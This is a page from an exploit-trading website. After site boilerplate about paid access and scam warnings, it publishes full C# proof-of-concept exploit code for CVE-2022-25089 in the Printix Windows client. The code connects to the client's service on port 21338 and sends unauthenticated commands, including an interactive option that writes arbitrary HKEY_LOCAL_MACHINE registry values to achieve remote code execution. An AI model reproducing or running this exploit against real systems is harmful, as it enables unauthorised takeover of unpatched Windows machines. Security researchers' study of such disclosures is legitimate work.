0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Printix Client 1.3.1106.0 - Remote Code Execution Exploit
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE) # Exploit Author: Logan Latvala # Vendor Homepage: https://printix.net # Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip # Version: <= 1.3.1106.0 # Tested on: Windows 7, Windows 8, Windows 10, Windows 11 # CVE : CVE-2022-25089 # Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089 using Microsoft.Win32; using Newtonsoft.Json; using Newtonsoft.Json.Converters; using System; using System.Collections.Generic; using System.Diagnostics; using System.Linq; using System.Text; using System.Threading; using System.Threading.Tasks; /** * ________________________________________ * * Printix Vulnerability, CVE-2022-25089 * Part of a Printix Vulnerability series * Author: Logan Latvala * Github: https://github.com/ComparedArray/printix-CVE-2022-25089 * ________________________________________ * */ namespace ConsoleApp1a { public class PersistentRegistryData { public PersistentRegistryCmds cmd; public string path; public int VDIType; public byte[] registryData; } [JsonConverter(typeof(StringEnumConverter))] public enum PersistentRegistryCmds { StoreData = 1, DeleteSubTree, RestoreData } public class Session { public int commandNumber { get; set; } public string host { get; set; } public string data { get; set; } public string sessionName { get; set; } public Session(int commandSessionNumber = 0) { commandNumber = commandSessionNumber; switch (commandSessionNumber) { //Incase it's initiated, kill it immediately. case (0): Environment.Exit(0x001); break; //Incase the Ping request is sent though, get its needed data. case (2): Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); Console.Write("IP: "); host = Console.ReadLine(); Console.WriteLine("Host address set to: " + host); data = "pingData"; sessionName = "PingerRinger"; break; //Incase the RegEdit request is sent though, get its needed data. case (49): Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); Console.Write("IP: "); host = Console.ReadLine(); Console.WriteLine("Host address set to: " + host); PersistentRegistryData persistentRegistryData = new PersistentRegistryData(); persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData; persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType; //persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName"; Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n"); Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n"); Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE"); Console.Write("Registry Node: "); persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE","printix"); Console.WriteLine("Full Address Set To: " + persistentRegistryData.path); //persistentRegistryData.registryData = new byte[2]; //byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String); Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword 3. Qword 4. Multi String \n"); Console.Write("Type: "); int dataF = int.Parse(Console.ReadLine()); Console.WriteLine("Set Data to: " + dataF); Console.WriteLine("\n What value is your type? \n"); Console.Write("Value: "); string dataB = Console.ReadLine(); Console.WriteLine("Set Data to: " + dataF); byte[] loader = null; List<byte> byteContainer = new List<byte>(); //Dword = 4 //SET THIS NUMBER TO THE TYPE OF DATA YOU ARE USING! (CHECK ABOVE FUNCITON selectDataType()!) switch (dataF) { case (1): loader = selectDataType(dataB, RegistryValueKind.String); byteContainer.Add(1); break; case (2): loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord); byteContainer.Add(4); break; case (3): loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord); byteContainer.Add(11); break; case (4): loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString); byteContainer.Add(7); break; } int pathHolder = 0; foreach (byte bit in loader) { pathHolder++; byteContainer.Add(bit); } persistentRegistryData.registryData = byteContainer.ToArray(); //added stuff: //PersistentRegistryData data = new PersistentRegistryData(); //data.cmd = PersistentRegistryCmds.RestoreData; //data.path = ""; //data.cmd Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData)); data = JsonConvert.SerializeObject(persistentRegistryData); break; //Custom cases, such as custom JSON Inputs and more. case (100): Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); Console.Write("IP: "); host = Console.ReadLine(); Console.WriteLine("Host address set to: " + host); Console.WriteLine("\n What Data Should Be Sent?\n"); Console.Write("Data: "); data = Console.ReadLine(); Console.WriteLine("Data set to: " + data); Console.WriteLine("\n What Session Name Should Be Used? \n"); Console.Write("Session Name: "); sessionName = Console.ReadLine(); Console.WriteLine("Session name set to: " + sessionName); break; } } public static byte[] selectDataType(object value, RegistryValueKind format) { byte[] array = new byte[50]; switch (format) { case RegistryValueKind.String: //1 array = Encoding.UTF8.GetBytes((string)value); break; case RegistryValueKind.DWord://4 array = ((!(value.GetType() == typeof(int))) ? BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value)); break; case RegistryValueKind.QWord://11 if (value == null) { value = 0L; } array = BitConverter.GetBytes((long)value); break; case RegistryValueKind.MultiString://7 { if (value == null) { value = new string[1] { string.Empty }; } string[] array2 = (string[])value; foreach (string s in array2) { byte[] bytes = Encoding.UTF8.GetBytes(s); byte[] second = new byte[1] { (byte)bytes.Length }; array = array.Concat(second).Concat(bytes).ToArray(); } break; } } return array; } } class CVESUBMISSION { static void Main(string[] args) { FORCERESTART: try { //Edit any registry without auth: //Use command 49, use the code provided on the desktop... //This modifies it directly, so no specific username is needed. :D //The command parameter, a list of commands is below. int command = 43; //To force the user to input variables or not. bool forceCustomInput = false; //The data to send, this isn't flexible and should be used only for specific examples. //Try to keep above 4 characters if you're just shoving things into the command. string data = "{\"profileID\":1,\"result\":true}"; //The username to use. //This is to fulfill the requriements whilst in development mode. DefaultValues.CurrentSessName = "printixMDNs7914"; //The host to connect to. DEFAULT= "localhost" string host = "192.168.1.29"; // Configuration Above InvalidInputLabel: Console.Clear(); Console.WriteLine("Please select the certificate you want to use with port 21338."); //Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now. Console.WriteLine("Already selected, client authentication isn't needed."); Console.WriteLine(" /───────────────────────────\\ "); Console.WriteLine("\nWhat would you like to do?"); Console.WriteLine("\n 1. Send Ping Request"); Console.WriteLine(" 2. Send Registry Edit Request"); Console.WriteLine(" 3. Send Custom Request"); Console.WriteLine(" 4. Experimental Mode (Beta)\n"); Console.Write("I choose option # "); try { switch (int.Parse(Console.ReadLine().ToLower())) { case (1): Session session = new Session(2); command = session.commandNumber; host = session.host; data = session.data; DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200); break; case (2): Session sessionTwo = new Session(49); command = sessionTwo.commandNumber; host = sessionTwo.host; data = sessionTwo.data; DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200); break; case (3): Console.WriteLine("What command number do you want to input?"); command = int.Parse(Console.ReadLine().ToString()); Console.WriteLine("What IP would you like to use? (Default = localhost)"); host = Console.ReadLine(); Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)"); data = Console.ReadLine(); Console.WriteLine("What session name do you want to use? "); DefaultValues.CurrentSessName = Console.ReadLine(); break; case (4): Console.WriteLine("Not yet implemented."); break; } } catch (Exception e) { Console.WriteLine("Invalid Input!"); goto InvalidInputLabel; } Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala"); Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n"); CompCommClient client = new CompCommClient(); byte[] responseStorage = new byte[25555]; int responseCMD = 0; client.Connect(host, 21338, 3, 10000); client.SendMessage(command, Encoding.UTF8.GetBytes(data)); // Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it. // Check for output multiple times, and see if this is conclusive. //client.SendMessage(51, Encoding.ASCII.GetBytes(data)); new Thread(() => { //Thread.Sleep(4000); if (client.Connected()) { int cam = 0; // 4 itterations of loops, may be lifted in the future. while (cam < 5) { //Reads the datastream and keeps returning results. //Thread.Sleep(100); try { try { if (responseStorage?.Any() == true) { //List<byte> byo1 = responseStorage.ToList(); if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption")) { foreach (char cam2 in Encoding.UTF8.GetString(responseStorage)) { if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2)) { Console.Write(cam2); } } }else { } } } catch (Exception e) { Debug.WriteLine(e); } client.Read(out responseCMD, out responseStorage); } catch (Exception e) { goto ReadException; } Thread.Sleep(100); cam++; //Console.WriteLine(cam); } } else { Console.WriteLine("[WARNING]: Client is Disconnected!"); } ReadException: try { Console.WriteLine("Command Variable Response: " + responseCMD); Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD); client.disConnect(); } catch (Exception e) { Console.WriteLine("After 4.2 Seconds, there has been no response!"); client.disConnect(); } }).Start(); Console.WriteLine(responseCMD); Console.ReadLine(); } catch (Exception e) { Console.WriteLine(e); Console.ReadLine(); //Environment.Exit(e.HResult); } goto FORCERESTART; } } } # 0day.today [2024-11-16] #